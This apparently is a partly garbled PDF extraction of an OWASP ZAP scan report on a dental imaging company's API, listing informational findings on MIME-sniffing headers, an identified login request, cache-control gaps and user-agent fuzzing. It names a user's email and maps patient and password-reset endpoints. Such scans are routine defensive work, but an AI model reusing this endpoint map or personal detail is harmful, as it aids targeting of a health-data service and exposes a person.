Reference CWE Id WASC Id	Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application /web server to not perform MIME-sniffing. http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx https://owasp.org/www-community/Security_Headers 693 15	
Reference CWE Id WASC Id Plugin Id Informational	Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application /web server to not perform MIME-sniffing. http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx https://owasp.org/www-community/Security_Headers 693 15 10021 Authentication Request Identified The given request has been identified as an authentication request. The 'Other Info' field contains a set of key=value lines which identify any relevant fields. If the request is in a context which has an Authentication Method set to "Auto-Detect" then this rule will change	
Reference CWE Id WASC Id Plugin Id Informational Description	Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application /web server to not perform MIME-sniffing. http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx https://owasp.org/www-community/Security_Headers 693 15 10021 Authentication Request Identified The given request has been identified as an authentication request. The 'Other Info' field contains a set of key=value lines which identify any relevant fields. If the request is in a context which has an Authentication Method set to "Auto-Detect" then this rule will change the authentication to match the request identified.	

Attack

Evidence	password
Other Info	userParam=email userValue=sachin@velmeni.com passwordParam=password
Instances	1
Solution	This is an informational alert rather than a vulnerability and so there is nothing to fix.
Reference	https://www.zaproxy.org/docs/desktop/addons/authentication-helper/auth-req-id/
CWE Id	
WASC Id	
Plugin Id	<u>10111</u>

i iugiii iu	<u>10111</u>
Informational	Re-examine Cache-control Directives
Description	The cache-control header has not been set properly or is missing, allowing the browser and proxies to cache content. For static assets like css, js, or image files this might be intended, however, the resources should be reviewed to ensure that no sensitive content will be cached.
URL	https://api.velmeni.ai/api/dental_robot/get_patient/D12345_1_100
Method	GET
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/analytics/get_comparison_report
Method	POST
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/auth
Method	POST
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/dental_robot/add_image
Method	POST
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/dental_robot/create_patients
Method	POST
Attack	
Evidence	
Other Info	

URL https://api.velmeni.ai/api/dental robot/create users

POST Method

Evidence

Attack

Other Info

URL https://api.velmeni.ai/api/sikka/add image

Method **POST**

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/sikka/create patient webhook

Method **POST**

Attack Evidence Other Info

URL https://api.velmeni.ai/api/user/complete forgot password

POST Method

Attack Evidence

Other Info

URL https://api.velmeni.ai/api/user/initiate forgot password

POST Method

Attack Evidence

Other Info

URL https://api.velmeni.ai/api/velmeni bridge/add image

Method **POST**

Attack

Evidence

Other Info

Reference

Instances 11

For secure content, ensure the cache-control HTTP header is set with "no-cache, no-store, Solution

must-revalidate". If an asset should be cached consider setting the directives "public, max-

age, immutable".

https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.

html#web-content-caching

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control

https://grayduck.mn/2021/09/13/cache-control-recommendations/

CWE Id <u>525</u> WASC Id

13

Plugin Id	<u>10015</u>
-----------	--------------

Informational	User Agent Fuzzer
	Check for differences in response based on fuzzed User Agent (eg. mobile sites, access as a
Description	Search Engine Crawler). Compares the response statuscode and the hashcode of the response body with the original response.
URL	https://api.velmeni.ai/api/auth
Method	POST
Attack	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/auth
Method	POST
Attack	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/auth
Method	POST
Attack	Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/auth
Method	POST
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/auth
Method	POST
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/auth
Method	POST
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/auth

Method POST

Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Evidence

Other Info

URL https://api.velmeni.ai/api/auth

Method POST

Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)

Evidence

Other Info

URL https://api.velmeni.ai/api/auth

Method POST

Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML,

like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4

Evidence

Other Info

URL https://api.velmeni.ai/api/auth

Method POST

Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18

(KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16

Evidence

Other Info

URL https://api.velmeni.ai/api/auth

Method POST

Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)

Evidence

Other Info

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Evidence

Other Info

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

Evidence

Other Info

URL https://api.velmeni.ai/api/dental-robot/add-image

Method POST

Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

Evidence Other

Other Info

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko

Evidence

Other Info

URL https://api.velmeni.ai/api/dental-robot/add-image

Method POST

Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)

Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0

Evidence

Other Info

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)

Chrome/91.0.4472.124 Safari/537.36

Evidence

Other Info

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0

Evidence Other Info

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Evidence Other Info

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)

Evidence Other Info

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML,

like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4

Evidence

Other Info

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18

(KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16

Evidence

Other Info

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)

Evidence

Other Info

Instances 23

Solution

Reference https://owasp.org/wstg

CWE Id

WASC Id

Plugin Id <u>10104</u>